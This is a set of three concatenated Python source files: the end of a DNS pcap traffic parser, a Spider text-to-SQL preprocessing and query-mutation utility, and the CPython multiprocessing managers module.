str(datetime.datetime.utcfromtimestamp(self.ts).strftime("%H:%M:%S")))
if self.mode > 0:
if self.c_name == "":
if self.answer.rlen == 4:
self.update_response(self.dns.id, socket.inet_ntoa(self.ip.dst), self.answer.name,
self.answer.type,
self.dns.rcode, self.answer.ttl, socket.inet_ntoa(self.answer.rdata), str(
datetime.datetime.utcfromtimestamp(self.ts).strftime("%d/%m/%y %H:%M:%S")))
else:
# Ignore NS records for TLDs: they return no IP and would raise an exception in inet_ntoa
if self.answer.rlen == 4:
self.update_response(self.dns.id, socket.inet_ntoa(self.ip.dst), self.c_name, self.answer.type,
self.dns.rcode, self.answer.ttl, socket.inet_ntoa(self.answer.rdata), str(
datetime.datetime.utcfromtimestamp(self.ts).strftime("%d/%m/%y %H:%M:%S")))
except:
if self.mode < 3:
print(self.dnsPktCount, '\t', "Unhandled Record Response type : " + str(self.answer.type))
elif self.answer.type == dpkt.dns.DNS_AAAA: # DNS_AAAA
try:
# dstIP = struct.unpack("!L", self.ip.dst)[0] # Destination self.ip
if self.mode < 2:
print(self.dnsPktCount, '\t', self.dns.id, '\tResponse\t', self.answer.name, '->',
str(ipaddr.IPv6Address(ipaddr.Bytes(self.answer.rdata))), '\t', self.answer.ttl, '\t',
self.answer.type, '\t',
socket.inet_ntoa(self.ip.dst), '\t',
str(datetime.datetime.utcfromtimestamp(self.ts).strftime(" %H:%M:%S")))
except:
print (self.dnsPktCount, '\t', self.dns.id, '\tResponse\t', "Failed Parsing DNS_AAAA ")
# Unhandled record types: PTR, DS, RRSIG, DNSKEY, TXT, SRV, SOA, HINFO (DNSSEC and misc records)
elif self.answer.type == 12 or self.answer.type == 43 or self.answer.type == 46 or self.answer.type == 48 or \
self.answer.type == 16 or self.answer.type == 33 or self.answer.type == 6 or self.answer.type == 13:
if self.mode < 2:
print(self.dnsPktCount, '\t', self.dns.id, '\tResponse\t DNS SEC :Unhandled type ', self.answer.type)
else:
if self.mode < 3:
print(self.dnsPktCount, '\t', "Unhandled Record Response type : " + str(self.answer.type))
# Beginning of Pcap parsing
def start_parse(self):
print ("Verbose : " + str(self.verbose))
print ("Mode : " + str(self.mode))
self.csv_obj.write_log("1", "Processing Started at", str(self.start))
print ("\n=============== Processing Started at " + str(self.start) + " =============\n")
self.progress_index = 10 # progress index =1,10,100,1000
for self.ts, self.buf in self.pcap:
if self.count <= self.dnsPktCount:
break
elif self.dnsPktCount == self.progress_index:
print '%10d' %self.dnsPktCount, "\t\t" + str(datetime.datetime.now() - self.start)
self.progress_index *= 10
if 0 == self.check_dns_traffic():
continue
# make the dns object out of the udp data and
# check for it being a RR (answer) and for opcode QUERY
try:
self.dns = dpkt.dns.DNS(self.udp.data)
except:
continue
# parse the dns Request & responses
self.dnsPktCount += 1
if self.dns.qr == dpkt.dns.DNS_Q:
self.parse_request()
if self.dns.qr != dpkt.dns.DNS_R:
# print (self.dns.qr)
continue
if self.dns.opcode != dpkt.dns.DNS_QUERY:
print (self.dns.opcode)
continue
# Error in Response Code
if self.dns.rcode != dpkt.dns.DNS_RCODE_NOERR:
self.dnsResponseCount += 1
if self.dns.rcode == dpkt.dns.DNS_RCODE_NXDOMAIN or self.dns.rcode == dpkt.dns.DNS_RCODE_REFUSED or \
self.dns.rcode == dpkt.dns.DNS_RCODE_SERVFAIL:
self.dnsFailedCount += 1
for self.answer in self.dns.qd:
try:
dstIP = struct.unpack("!L", self.ip.dst)[0] # Destination self.ip
if self.mode > 0:
self.update_response(self.dns.id, socket.inet_ntoa(self.ip.dst), self.answer.name, self.answer.type, self.dns.rcode, 0, 0, str(datetime.datetime.utcfromtimestamp(self.ts).strftime("%d/%m/%y %H:%M:%S")))
if self.mode < 2:
print (self.dnsPktCount, '\t', self.dns.id, '\tFail/Refused\t', self.answer.name, self.dns.rcode,
socket.inet_ntoa(self.ip.dst), '\t',
str(datetime.datetime.utcfromtimestamp(self.ts).strftime("%H:%M:%S")))
continue
except:
continue
else:
print (self.dnsPktCount, '\t', self.dns.id, ' unhandled dns.rcode:', self.dns.rcode)
continue
# New Types in DNS SEC not understood by the parser
if len(self.dns.an) < 1:
self.dnsResponseCount += 1
if self.dns.rcode != dpkt.dns.DNS_RCODE_REFUSED:
# Todo: DNS SEC support
if self.mode < 2:
print(self.dnsPktCount, '\t', self.dns.id, "\tResponse \t Unhandled DNSSEC : opcode",
self.dns.opcode, "\t Rcode", self.dns.rcode)
continue
try:
# process and print responses based on record type
c_name = ""
self.dnsResponseCount += 1
# for answer in dns.an:
for self.answer in self.dns.an:
self.parse_response()
for self.answer in self.dns.ns:
self.parse_response()
for self.answer in self.dns.ar:
self.parse_response()
except:
# print (dnsPktCount,'\t',"Unhandled Query type : " + str(self.answer.type))
print(self.dnsPktCount, '\t', "Unhandled Query type : ")
self.f.close()
print("\n=============== Processing completed at " + str(datetime.datetime.now()) + " ==========\n")
print("Total number of Packets Processed : \t\t" + str(self.dnsPktCount))
print("Total number of DNS Query : \t\t\t" + str(self.dnsQueryCount))
print("Total number of DNS Responses: \t\t\t" + str(self.dnsResponseCount))
print("Total number of Unknown Response Records : \t" + str(self.dnsUnknownResponseCount))
print("Total number of Failed Responses: \t\t" + str(self.dnsFailedCount))
print("Total Time taken : \t\t\t\t" + str(datetime.datetime.now() - self.start))
self.csv_obj.write_log("2", "Processing completed at ", str(datetime.datetime.now()))
self.csv_obj.write_log("3", "Total number of Packets Processed", str(self.dnsPktCount))
self.csv_obj.write_log("4", "Total number of DNS Query", str(self.dnsQueryCount))
self.csv_obj.write_log("5", "Total number of DNS Responses: ", str(self.dnsResponseCount))
self.csv_obj.write_log("6", "Total number of Unknown Response Records", str(self.dnsUnknownResponseCount))
self.csv_obj.write_log("7", "Total number of Failed Responses", str(self.dnsFailedCount))
self.csv_obj.write_log("8", "Total Time taken", str(datetime.datetime.now() - self.start))
# AnalyseData(self.filename + "_req.csv")
self.csv_obj.close()
#analyse_data(self.filename + "_req.csv")
# from DnsMapper
#csv_only = 0 ;
#if csv_only == 0:
# return
if self.csv_obj.pipeline == 0:
t = Thread(target=map_analyse_data, args=(self.filename, 1))
t.start()
t.join()
#thread.start_new_thread(map_analyse_data, (self.filename, 3))
#thread.join()
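# Batch driver: iterates over a hard-coded list of hourly capture files and parses each
# in CSV mode (mode 3). Note that the call below currently points at a fixed sample file
# and returns after the first iteration.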
def batch_parse():
filename_list = ["20160423_235403.pcap","20160424_005404.pcap","20160424_015405.pcap","20160424_025406.pcap",
"20160424_035407.pcap","20160424_045408.pcap","20160424_055409.pcap","20160424_065410.pcap",
"20160424_075411.pcap","20160424_085412.pcap","20160424_095413.pcap","20160424_105414.pcap",
"20160424_115415.pcap","20160424_125416.pcap","20160424_135417.pcap","20160424_145418.pcap",
"20160424_155419.pcap","20160424_165420.pcap","20160424_175421.pcap","20160424_185422.pcap",
"20160424_195423.pcap","20160424_205424.pcap","20160424_215425.pcap","20160424_225426.pcap",
"20160424_235427.pcap","20160425_005428.pcap","20160425_015429.pcap","20160425_025430.pcap",
"20160425_035431.pcap","20160425_045432.pcap","20160425_055433.pcap","20160425_065434.pcap",
"20160425_075435.pcap","20160425_085436.pcap","20160425_095437.pcap","20160425_105438.pcap",
"20160425_115439.pcap","20160425_125440.pcap","20160425_135441.pcap","20160425_145442.pcap",
"20160425_155443.pcap","20160425_165444.pcap","20160425_175445.pcap","20160425_185446.pcap",
"20160425_195447.pcap","20160425_205448.pcap","20160425_215449.pcap","20160425_225450.pcap",
"20160426_231401.pcap","20160427_001402.pcap","20160427_011403.pcap","20160427_021404.pcap",
"20160427_031405.pcap","20160427_041406.pcap","20160427_051407.pcap","20160427_061408.pcap",
"20160427_071409.pcap","20160427_081410.pcap","20160427_091411.pcap","20160427_101412.pcap",
"20160427_111413.pcap","20160427_121414.pcap","20160427_131415.pcap","20160427_141416.pcap",
"20160427_151417.pcap","20160427_161418.pcap","20160427_171419.pcap","20160427_181420.pcap",
"20160427_191421.pcap","20160427_201422.pcap","20160427_211423.pcap","20160427_221424.pcap",
"20160427_231425.pcap","20160428_001426.pcap","20160428_011427.pcap","20160428_021428.pcap",
"20160428_031429.pcap","20160428_041430.pcap","20160428_051431.pcap","20160428_061432.pcap",
"20160428_071433.pcap","20160428_081434.pcap","20160428_091435.pcap","20160428_101436.pcap",
"20160428_111437.pcap","20160428_121438.pcap","20160428_131439.pcap","20160428_141440.pcap",
"20160428_151441.pcap","20160428_161442.pcap","20160428_171443.pcap","20160428_181444.pcap",
"20160428_191445.pcap","20160428_201446.pcap","20160428_211447.pcap","20160428_221448.pcap",
"20160428_231449.pcap","20160429_001450.pcap","20160429_011451.pcap","20160429_021452.pcap",
"20160429_031453.pcap","20160429_041454.pcap","20160429_051455.pcap","20160429_061456.pcap",
"20160429_071457.pcap","20160429_081458.pcap","20160429_091459.pcap","20160429_101500.pcap",
"20160429_111501.pcap","20160429_121502.pcap","20160429_131503.pcap","20160429_141504.pcap",
"20160429_151505.pcap","20160429_161506.pcap","20160429_171507.pcap","20160429_181508.pcap",
"20160429_191509.pcap","20160429_201510.pcap","20160429_211511.pcap","20160429_221512.pcap",
"20160429_231513.pcap","20160430_001514.pcap","20160430_011515.pcap","20160430_021516.pcap",
"20160430_031517.pcap","20160430_041518.pcap","20160430_051519.pcap","20160430_061520.pcap",
"20160430_071521.pcap","20160430_081522.pcap","20160430_091523.pcap","20160430_101524.pcap",
"20160430_111525.pcap","20160430_121526.pcap","20160430_131527.pcap","20160430_141528.pcap",
"20160430_151529.pcap","20160430_161530.pcap","20160430_171531.pcap","20160430_181532.pcap",
"20160430_191533.pcap","20160430_201534.pcap","20160430_211535.pcap","20160430_221536.pcap",
"20160430_231537.pcap","20160501_001538.pcap","20160501_011539.pcap","20160501_021540.pcap",
"20160501_031541.pcap","20160501_041542.pcap","20160501_051543.pcap","20160501_061544.pcap",
"20160501_071545.pcap","20160501_081546.pcap","20160501_091547.pcap","20160501_101548.pcap",
"20160501_111549.pcap","20160501_121550.pcap","20160501_131551.pcap","20160501_141552.pcap",
"20160501_151553.pcap","20160501_161554.pcap","20160501_171555.pcap","20160501_181556.pcap",
"20160501_191557.pcap","20160501_201558.pcap","20160501_211559.pcap","20160501_221600.pcap",
"20160506_231542.pcap","20160507_001543.pcap","20160507_011544.pcap","20160507_021545.pcap",
"20160507_031546.pcap","20160507_041547.pcap","20160507_051548.pcap","20160507_061549.pcap",
"20160507_071550.pcap","20160507_081551.pcap","20160507_091552.pcap","20160507_101553.pcap",
"20160507_111554.pcap","20160507_121555.pcap","20160507_131556.pcap","20160507_141557.pcap",
"20160507_151558.pcap","20160507_161559.pcap","20160507_171600.pcap","20160507_181601.pcap",
"20160507_191602.pcap","20160507_201603.pcap","20160507_211604.pcap","20160507_221605.pcap",
"20160507_231606.pcap","20160508_001607.pcap","20160508_011608.pcap","20160508_021609.pcap",
"20160508_031610.pcap","20160508_041611.pcap","20160508_051612.pcap","20160508_061613.pcap",
"20160508_071614.pcap","20160508_081615.pcap","20160508_091616.pcap","20160508_101617.pcap",
"20160508_111618.pcap","20160508_121619.pcap","20160508_131620.pcap","20160508_141621.pcap",
"20160508_151622.pcap","20160508_161623.pcap","20160508_171624.pcap","20160508_181625.pcap",
"20160508_191626.pcap","20160508_201627.pcap","20160508_211628.pcap","20160508_221629.pcap",
"20160508_231630.pcap","20160509_001631.pcap","20160509_011632.pcap","20160509_021633.pcap",
"20160509_031634.pcap","20160509_041635.pcap","20160509_051636.pcap","20160509_061637.pcap",
"20160509_071638.pcap","20160509_081639.pcap","20160509_091640.pcap","20160509_101641.pcap",
"20160509_111642.pcap","20160509_121643.pcap","20160509_131644.pcap","20160509_141645.pcap",
"20160509_151646.pcap","20160509_161647.pcap","20160509_171648.pcap","20160509_181649.pcap",
"20160509_191650.pcap","20160509_201651.pcap","20160509_211652.pcap","20160509_221653.pcap"]
for items in filename_list:
try:
#obj_dns_parser = PcapParser(10000000, 3, '../../Traffic/' + items, 1)
obj_dns_parser = PcapParser(10000000, 3, '../../sample_large.pcap', 1)
obj_dns_parser.start_parse()
return()
except:
print("File Not Found")
# return
time.sleep(5)
# obj_dns_parser = PcapParser(10000, 3, 'E:/Phd/python/scripts/DNS_AAAA.pcap', 1)
def main():
print ("\n================================= DNS Parse v0.01 =============================\n")
try:
opts, args = getopt.getopt(sys.argv[1:], "vm:c:f:")
# print (sys.argv)
except:
print(syntax)
sys.exit(2)
filename = ""
# Count of packets to parse
max_pkt_count = 1000
mode = 4
verbose = 0
for opt, arg in opts:
if opt == '-h':
print(syntax)
sys.exit()
elif opt in "-f":
filename = arg
print ("Opening File : " + str(filename))
elif opt in "-v":
verbose = 1
elif opt in "-m":
mode = int(arg)
elif opt in "-c":
max_pkt_count = int(arg)
print ("Maximum Packet count : " + str(max_pkt_count))
else:
print(syntax)
sys.exit()
if filename == "":
print(syntax)
#sys.exit()
obj_dns_parser = PcapParser(max_pkt_count, mode, filename, verbose)
#obj_dns_parser = PcapParser(1000, 3, '../sample/sample.pcap', 1)
obj_dns_parser.start_parse()
if __name__ == "__main__":
batch_parse()
|
utils.py
|
import os
from config import *
import random
import json
from tqdm import tqdm
from sql_formatter.formatting import translate_sql
import sqlite3
import multiprocessing
from multiprocessing import Manager
import time
random.seed(33)
def mkdir(path):
if os.path.exists(path):
print("{} already exists".format(path))
else:
os.mkdir(path)
print("{} creates".format(path))
def read_json(path):
f = open(path, "r", encoding="utf-8")
content = json.load(f)
f.close()
return content
def write_json(path, data):
f = open(path, "w", encoding="utf-8")
f.write(json.dumps(data, indent=4))
f.close()
def preprocess_spider(rawdata, t):
preprocess = {}
print("preprocess {}".format(t))
for data in tqdm(rawdata):
query = data[Spider_query]
translated_sql, translated_struct_sql = translate_sql(query)
preprocess[query] = translated_struct_sql
print("{} done".format(t))
return preprocess
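# Runs one mutated statement against the shared sqlite cursor inside a worker process
# and stores it in return_dict if it executes without raising; the executable_SQL flag
# (whether the original query returned rows) gates an additional row-count check on the
# mutation's result.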
def execute_sql(c, mutated_sql, return_dict, executable_SQL):
try:
cursor = c.execute(mutated_sql)
if executable_SQL:
if list(cursor):
return_dict[mutated_sql] = mutated_sql
else:
return_dict[mutated_sql] = mutated_sql
except:
pass
def get_dbschema(path):
db_schema = {}
with open(path) as f:
db_file = json.load(f)
for data in db_file:
db_schema[data['db_id']] = {}
for tab_id, col in data['column_names_original']:
if col == '*':
continue
if tab_id not in db_schema[data['db_id']]:
db_schema[data['db_id']][tab_id] = [col, '~', '*']
else:
db_schema[data['db_id']][tab_id] += [col]
return db_schema
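# Generates up to mutate_iter_num variants of a Spider query by randomly swapping SQL
# keywords, substituting column names from the database schema and perturbing numeric
# literals (thresholds alpha/beta/gamma/theta come from config). Each candidate is
# executed in its own process under a timeout via execute_sql(); the surviving mutations
# are deduplicated and stored in sql_dict keyed by the original query.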
def mutate_sql(index, data, time_out, sql_dict, db_schema, db_dir):
manager = Manager()
return_dict = manager.dict()
jobs = []
db_id = data['db_id']
raw_sql = data['query']
sql = data['query_toks']
tables = db_schema[db_id]
db_path = os.path.join(db_dir, db_id, db_id + '.sqlite')
mutated_sqls = []
if raw_sql not in sql_dict:
sql_dict[raw_sql] = []
else:
return
executable_SQL = True
conn = sqlite3.connect(db_path, timeout=10.0)
c = conn.cursor()
try:
cursor = c.execute(raw_sql)
if not list(cursor):
executable_SQL = False
except:
executable_SQL = False
for i in range(mutate_iter_num):
mutated_sql = []
for tok_i, tok in enumerate(sql):
upper_tok = tok.upper()
new_tok = tok
if random.random() > alpha:
for k, v in swap_dict.items():
if upper_tok in v:
swap_tok = random.choice(v)
new_tok = swap_tok if swap_tok != tok.upper() else tok
if random.random() > beta:
for k, v in tables.items():
if '.' in tok:
alias = tok.split('.')[0]
col = tok.split('.')[1]
if col in v or col.capitalize() in v:
col = random.choice(v)
new_tok = alias + '.' + col
else:
if tok in v or tok.capitalize() in v:
new_tok = random.choice(v)
if random.random() > gamma and new_tok != tok:
new_tok = tok + ' , ' + new_tok
if tok.isnumeric() and random.random() < theta:
tok = max(int(tok) + random.randint(-10, 10), 0)
new_tok = str(tok)
mutated_sql.append(new_tok)
mutated_sql = ' '.join(mutated_sql)
mutated_sql = mutated_sql.replace(", ~ ", ",").replace(" ~ ,", ",").replace(", ~ ,", ",").replace("~",
"").replace(
'``', '\"').replace("''", '\"')
if mutated_sql == ' '.join(sql):
continue
p = multiprocessing.Process(target=execute_sql, args=(c, mutated_sql, return_dict, executable_SQL))
jobs.append(p)
p.start()
start = time.time()
while time.time() - start <= time_out:
if not any(p.is_alive() for p in jobs):
break
time.sleep(.1)
else:
print("Timeout with processing: {} \n".format(raw_sql))
for p in jobs:
p.terminate()
p.join()
mutated_sqls = return_dict.values()
mutated_sqls = list(set(mutated_sqls))
sql_dict[raw_sql] = mutated_sqls
if len(mutated_sqls) < 5:
print("SQL {}: {}".format(index, raw_sql))
print(mutated_sqls)
print('Valid Mutation: {}'.format(len(mutated_sqls)), "\n--------------------------------------")
def create_output(t, idir, odir):
rawdir = os.path.join(odir, Raw)
preprocessdir = os.path.join(odir, Preprocess)
mkdir(rawdir)
mkdir(preprocessdir)
if t == 'spider':
traindata = read_json(os.path.join(idir, Spider_train))
otherdata = read_json(os.path.join(idir, Spider_others))
devdata = read_json(os.path.join(idir, Spider_dev))
rawtrain = []
rawdev = []
rawtest = devdata
rawoutofdomain = otherdata
random.shuffle(traindata)
train_len = round(len(traindata) * 0.8)
print("spider raw starts")
for i, data in enumerate(tqdm(traindata)):
if i < train_len:
rawtrain.append(data)
else:
rawdev.append(data)
print("spider raw done")
write_json(os.path.join(rawdir, Trainjson), rawtrain)
write_json(os.path.join(rawdir, Devjson), rawdev)
write_json(os.path.join(rawdir, Testjson), rawtest)
write_json(os.path.join(rawdir, Outofdomainjson), rawoutofdomain)
print("spider preprocess starts")
preprocesstrain = preprocess_spider(rawtrain, 'train')
write_json(os.path.join(preprocessdir, Trainjson), preprocesstrain)
preprocessdev = preprocess_spider(rawdev, 'dev')
write_json(os.path.join(preprocessdir, Devjson), preprocessdev)
preprocesstest = preprocess_spider(rawtest, 'test')
write_json(os.path.join(preprocessdir, Testjson), preprocesstest)
preprocessoutofdomain = preprocess_spider(rawoutofdomain, 'outofdomain')
write_json(os.path.join(preprocessdir, Outofdomainjson), preprocessoutofdomain)
print("spider preprocess done")
print("mutate starts")
db_schema = get_dbschema(os.path.join(idir, Spider_table))
total_data = []
total_data += traindata + devdata + otherdata
sql_dict = {}
for index, data in enumerate(tqdm(total_data)):
time_out = 3
mutate_sql(index, data, time_out, sql_dict, db_schema, os.path.join(idir, Spider_database))
write_json(os.path.join(preprocessdir, Mutationjson), sql_dict)
print("mutate done")
else:
print("spider preprocess starts")
preprocesstrain = preprocess_spider(rawtrain, 'train')
write_json(os.path.join(preprocessdir, Trainjson), preprocesstrain)
print("spider preprocess done")
"""print("mutate starts")
db_schema = get_dbschema(os.path.join(idir, Spider_table))
total_data = []
total_data += traindata + devdata + otherdata
sql_dict = {}
for index, data in enumerate(tqdm(total_data)):
time_out = 3
mutate_sql(index, data, time_out, sql_dict, db_schema, os.path.join(idir, Spider_database))
write_json(os.path.join(preprocessdir, Mutationjson), sql_dict)
print("mutate done")"""
|
managers.py
|
#
# Module providing manager classes for dealing
# with shared objects
#
# multiprocessing/managers.py
#
# Copyright (c) 2006-2008, R Oudkerk
# Licensed to PSF under a Contributor Agreement.
#
__all__ = [ 'BaseManager', 'SyncManager', 'BaseProxy', 'Token' ]
#
# Imports
#
import sys
import threading
import signal
import array
import queue
import time
import types
import os
from os import getpid
from traceback import format_exc
from . import connection
from .context import reduction, get_spawning_popen, ProcessError
from . import pool
from . import process
from . import util
from . import get_context
try:
from . import shared_memory
except ImportError:
HAS_SHMEM = False
else:
HAS_SHMEM = True
__all__.append('SharedMemoryManager')
#
# Register some things for pickling
#
def reduce_array(a):
return array.array, (a.typecode, a.tobytes())
reduction.register(array.array, reduce_array)
view_types = [type(getattr({}, name)()) for name in ('items','keys','values')]
if view_types[0] is not list: # only needed in Py3.0
def rebuild_as_list(obj):
return list, (list(obj),)
for view_type in view_types:
reduction.register(view_type, rebuild_as_list)
#
# Type for identifying shared objects
#
class Token(object):
'''
Type to uniquely identify a shared object
'''
__slots__ = ('typeid', 'address', 'id')
def __init__(self, typeid, address, id):
(self.typeid, self.address, self.id) = (typeid, address, id)
def __getstate__(self):
return (self.typeid, self.address, self.id)
def __setstate__(self, state):
(self.typeid, self.address, self.id) = state
def __repr__(self):
return '%s(typeid=%r, address=%r, id=%r)' % \
(self.__class__.__name__, self.typeid, self.address, self.id)
#
# Function for communication with a manager's server process
#
def dispatch(c, id, methodname, args=(), kwds={}):
'''
Send a message to manager using connection `c` and return response
'''
c.send((id, methodname, args, kwds))
kind, result = c.recv()
if kind == '#RETURN':
return result
raise convert_to_error(kind, result)
def convert_to_error(kind, result):
if kind == '#ERROR':
return result
elif kind in ('#TRACEBACK', '#UNSERIALIZABLE'):
if not isinstance(result, str):
raise TypeError(
"Result {0!r} (kind '{1}') type is {2}, not str".format(
result, kind, type(result)))
if kind == '#UNSERIALIZABLE':
return RemoteError('Unserializable message: %s\n' % result)
else:
return RemoteError(result)
else:
return ValueError('Unrecognized message type {!r}'.format(kind))
class RemoteError(Exception):
def __str__(self):
return ('\n' + '-'*75 + '\n' + str(self.args[0]) + '-'*75)
#
# Functions for finding the method names of an object
#
def all_methods(obj):
'''
Return a list of names of methods of `obj`
'''
temp = []
for name in dir(obj):
func = getattr(obj, name)
if callable(func):
temp.append(name)
return temp
def public_methods(obj):
'''
Return a list of names of methods of `obj` which do not start with '_'
'''
return [name for name in all_methods(obj) if name[0] != '_']
#
# Server which is run in a process controlled by a manager
#
class Server(object):
'''
Server class which runs in a process controlled by a manager object
'''
public = ['shutdown', 'create', 'accept_connection', 'get_methods',
'debug_info', 'number_of_objects', 'dummy', 'incref', 'decref']
def __init__(self, registry, address, authkey, serializer):
if not isinstance(authkey, bytes):
raise TypeError(
"Authkey {0!r} is type {1!s}, not bytes".format(
authkey, type(authkey)))
self.registry = registry
self.authkey = process.AuthenticationString(authkey)
Listener, Client = listener_client[serializer]
# do authentication later
self.listener = Listener(address=address, backlog=16)
self.address = self.listener.address
self.id_to_obj = {'0': (None, ())}
self.id_to_refcount = {}
self.id_to_local_proxy_obj = {}
self.mutex = threading.Lock()
def serve_forever(self):
'''
Run the server forever
'''
self.stop_event = threading.Event()
process.current_process()._manager_server = self
try:
accepter = threading.Thread(target=self.accepter)
accepter.daemon = True
accepter.start()
try:
while not self.stop_event.is_set():
self.stop_event.wait(1)
except (KeyboardInterrupt, SystemExit):
pass
finally:
if sys.stdout != sys.__stdout__: # what about stderr?
util.debug('resetting stdout, stderr')
sys.stdout = sys.__stdout__
sys.stderr = sys.__stderr__
sys.exit(0)
def accepter(self):
while True:
try:
c = self.listener.accept()
except OSError:
continue
t = threading.Thread(target=self.handle_request, args=(c,))
t.daemon = True
t.start()
def _handle_request(self, c):
request = None
try:
connection.deliver_challenge(c, self.authkey)
connection.answer_challenge(c, self.authkey)
request = c.recv()
ignore, funcname, args, kwds = request
assert funcname in self.public, '%r unrecognized' % funcname
func = getattr(self, funcname)
except Exception:
msg = ('#TRACEBACK', format_exc())
else:
try:
result = func(c, *args, **kwds)
except Exception:
msg = ('#TRACEBACK', format_exc())
else:
msg = ('#RETURN', result)
try:
c.send(msg)
except Exception as e:
try:
c.send(('#TRACEBACK', format_exc()))
except Exception:
pass
util.info('Failure to send message: %r', msg)
util.info(' ... request was %r', request)
util.info(' ... exception was %r', e)
def handle_request(self, conn):
'''
Handle a new connection
'''
try:
self._handle_request(conn)
except SystemExit:
# Server.serve_client() calls sys.exit(0) on EOF
pass
finally:
conn.close()
def serve_client(self, conn):
'''
Handle requests from the proxies in a particular process/thread
'''
util.debug('starting server thread to service %r',
threading.current_thread().name)
recv = conn.recv
send = conn.send
id_to_obj = self.id_to_obj
while not self.stop_event.is_set():
try:
methodname = obj = None
request = recv()
ident, methodname, args, kwds = request
try:
obj, exposed, gettypeid = id_to_obj[ident]
except KeyError as ke:
try:
obj, exposed, gettypeid = \
self.id_to_local_proxy_obj[ident]
except KeyError:
raise ke
if methodname not in exposed:
raise AttributeError(
'method %r of %r object is not in exposed=%r' %
(methodname, type(obj), exposed)
)
function = getattr(obj, methodname)
try:
res = function(*args, **kwds)
except Exception as e:
msg = ('#ERROR', e)
else:
typeid = gettypeid and gettypeid.get(methodname, None)
if typeid:
rident, rexposed = self.create(conn, typeid, res)
token = Token(typeid, self.address, rident)
msg = ('#PROXY', (rexposed, token))
else:
msg = ('#RETURN', res)
except AttributeError:
if methodname is None:
msg = ('#TRACEBACK', format_exc())
else:
try:
fallback_func = self.fallback_mapping[methodname]
result = fallback_func(
self, conn, ident, obj, *args, **kwds
)
msg = ('#RETURN', result)
except Exception:
msg = ('#TRACEBACK', format_exc())
except EOFError:
util.debug('got EOF -- exiting thread serving %r',
threading.current_thread().name)
sys.exit(0)
except Exception:
msg = ('#TRACEBACK', format_exc())
try:
try:
send(msg)
except Exception:
send(('#UNSERIALIZABLE', format_exc()))
except Exception as e:
util.info('exception in thread serving %r',
threading.current_thread().name)
util.info(' ... message was %r', msg)
util.info(' ... exception was %r', e)
conn.close()
sys.exit(1)
def fallback_getvalue(self, conn, ident, obj):
return obj
def fallback_str(self, conn, ident, obj):
return str(obj)
def fallback_repr(self, conn, ident, obj):
return repr(obj)
fallback_mapping = {
'__str__':fallback_str,
'__repr__':fallback_repr,
'#GETVALUE':fallback_getvalue
}
def dummy(self, c):
pass
def debug_info(self, c):
'''
Return some info --- useful to spot problems with refcounting
'''
# Perhaps include debug info about 'c'?
with self.mutex:
result = []
keys = list(self.id_to_refcount.keys())
keys.sort()
for ident in keys:
if ident != '0':
result.append(' %s: refcount=%s\n %s' %
(ident, self.id_to_refcount[ident],
str(self.id_to_obj[ident][0])[:75]))
return '\n'.join(result)
def number_of_objects(self, c):
'''
Number of shared objects
'''
# Doesn't use (len(self.id_to_obj) - 1) as we shouldn't count ident='0'
return len(self.id_to_refcount)
def shutdown(self, c):
'''
Shutdown this process
'''
try:
util.debug('manager received shutdown message')
c.send(('#RETURN', None))
except:
import traceback
traceback.print_exc()
finally:
self.stop_event.set()
def create(self, c, typeid, /, *args, **kwds):
'''
Create a new shared object and return its id
'''
with self.mutex:
callable, exposed, method_to_typeid, proxytype = \
self.registry[typeid]
if callable is None:
if kwds or (len(args) != 1):
raise ValueError(
"Without callable, must have one non-keyword argument")
obj = args[0]
else:
obj = callable(*args, **kwds)
if exposed is None:
exposed = public_methods(obj)
if method_to_typeid is not None:
if not isinstance(method_to_typeid, dict):
raise TypeError(
"Method_to_typeid {0!r}: type {1!s}, not dict".format(
method_to_typeid, type(method_to_typeid)))
exposed = list(exposed) + list(method_to_typeid)
ident = '%x' % id(obj) # convert to string because xmlrpclib
# only has 32 bit signed integers
util.debug('%r callable returned object with id %r', typeid, ident)
self.id_to_obj[ident] = (obj, set(exposed), method_to_typeid)
if ident not in self.id_to_refcount:
self.id_to_refcount[ident] = 0
self.incref(c, ident)
return ident, tuple(exposed)
def get_methods(self, c, token):
'''
Return the methods of the shared object indicated by token
'''
return tuple(self.id_to_obj[token.id][1])
def accept_connection(self, c, name):
'''
Spawn a new thread to serve this connection
'''
threading.current_thread().name = name
c.send(('#RETURN', None))
self.serve_client(c)
def incref(self, c, ident):
with self.mutex:
try:
self.id_to_refcount[ident] += 1
except KeyError as ke:
# If no external references exist but an internal (to the
# manager) still does and a new external reference is created
# from it, restore the manager's tracking of it from the
# previously stashed internal ref.
if ident in self.id_to_local_proxy_obj:
self.id_to_refcount[ident] = 1
self.id_to_obj[ident] = \
self.id_to_local_proxy_obj[ident]
obj, exposed, gettypeid = self.id_to_obj[ident]
util.debug('Server re-enabled tracking & INCREF %r', ident)
else:
raise ke
def decref(self, c, ident):
if ident not in self.id_to_refcount and \
ident in self.id_to_local_proxy_obj:
util.debug('Server DECREF skipping %r', ident)
return
with self.mutex:
if self.id_to_refcount[ident] <= 0:
raise AssertionError(
"Id {0!s} ({1!r}) has refcount {2:n}, not 1+".format(
ident, self.id_to_obj[ident],
self.id_to_refcount[ident]))
self.id_to_refcount[ident] -= 1
if self.id_to_refcount[ident] == 0:
del self.id_to_refcount[ident]
if ident not in self.id_to_refcount:
# Two-step process in case the object turns out to contain other
# proxy objects (e.g. a managed list of managed lists).
# Otherwise, deleting self.id_to_obj[ident] would trigger the
# deleting of the stored value (another managed object) which would
# in turn attempt to acquire the mutex that is already held here.
self.id_to_obj[ident] = (None, (), None) # thread-safe
util.debug('disposing of obj with id %r', ident)
with self.mutex:
del self.id_to_obj[ident]
#
# Class to represent state of a manager
#
class State(object):
__slots__ = ['value']
INITIAL = 0
STARTED = 1
SHUTDOWN = 2
#
# Mapping from serializer name to Listener and Client types
#
listener_client = {
'pickle' : (connection.Listener, connection.Client),
'xmlrpclib' : (connection.XmlListener, connection.XmlClient)
}
#
# Definition of BaseManager
#
class BaseManager(object):
'''
Base class for managers
'''
_registry = {}
_Server = Server
def __init__(self, address=None, authkey=None, serializer='pickle',
ctx=None):
if authkey is None:
authkey = process.current_process().authkey
self._address = address # XXX not final address if eg ('', 0)
self._authkey = process.AuthenticationString(authkey)
self._state = State()
self._state.value = State.INITIAL
self._serializer = serializer
self._Listener, self._Client = listener_client[serializer]
self._ctx = ctx or get_context()
def get_server(self):
'''
Return server object with serve_forever() method and address attribute
'''
if self._state.value != State.INITIAL:
if self._state.value == State.STARTED:
raise ProcessError("Already started server")
elif self._state.value == State.SHUTDOWN:
raise ProcessError("Manager has shut down")
else:
raise ProcessError(
"Unknown state {!r}".format(self._state.value))
return Server(self._registry, self._address,
self._authkey, self._serializer)
